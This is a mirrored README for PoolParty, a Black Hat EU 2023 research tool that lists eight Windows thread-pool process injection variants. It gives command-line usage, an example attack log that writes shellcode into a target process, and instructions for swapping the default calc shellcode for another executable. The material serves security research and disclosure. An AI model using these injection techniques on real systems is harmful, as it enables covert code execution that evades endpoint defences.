Code Monkey home page Code Monkey logo

poolparty's Introduction

PoolParty

A collection of fully-undetectable process injection techniques abusing Windows Thread Pools. Presented at Black Hat EU 2023 Briefings under the title - The Pool Party You Will Never Forget: New Process Injection Techniques Using Windows Thread Pools

PoolParty Variants

Variant ID Varient Description
1 Overwrite the start routine of the target worker factory
2 Insert TP_WORK work item to the target process's thread pool
3 Insert TP_WAIT work item to the target process's thread pool
4 Insert TP_IO work item to the target process's thread pool
5 Insert TP_ALPC work item to the target process's thread pool
6 Insert TP_JOB work item to the target process's thread pool
7 Insert TP_DIRECT work item to the target process's thread pool
8 Insert TP_TIMER work item to the target process's thread pool

Usage

PoolParty.exe -V <VARIANT ID> -P <TARGET PID>

Usage Examples

Insert TP_TIMER work item to process ID 1234

>> PoolParty.exe -V 8 -P 1234

[info]    Starting PoolParty attack against process id: 1234
[info]    Retrieved handle to the target process: 00000000000000B8
[info]    Hijacked worker factory handle from the target process: 0000000000000058
[info]    Hijacked timer queue handle from the target process: 0000000000000054
[info]    Allocated shellcode memory in the target process: 00000281DBEF0000
[info]    Written shellcode to the target process
[info]    Retrieved target worker factory basic information
[info]    Created TP_TIMER structure associated with the shellcode
[info]    Allocated TP_TIMER memory in the target process: 00000281DBF00000
[info]    Written the specially crafted TP_TIMER structure to the target process
[info]    Modified the target process's TP_POOL tiemr queue list entry to point to the specially crafted TP_TIMER
[info]    Set the timer queue to expire to trigger the dequeueing TppTimerQueueExpiration
[info]    PoolParty attack completed successfully

Default Shellcode and Customization

The default shellcode spawns a calculator via the WinExec API.

To customize the executable to execute, change the path in the end of the g_Shellcode variable present in the main.cpp file.

Author - Alon Leviev

poolparty's People

Contributors

0xdeku avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.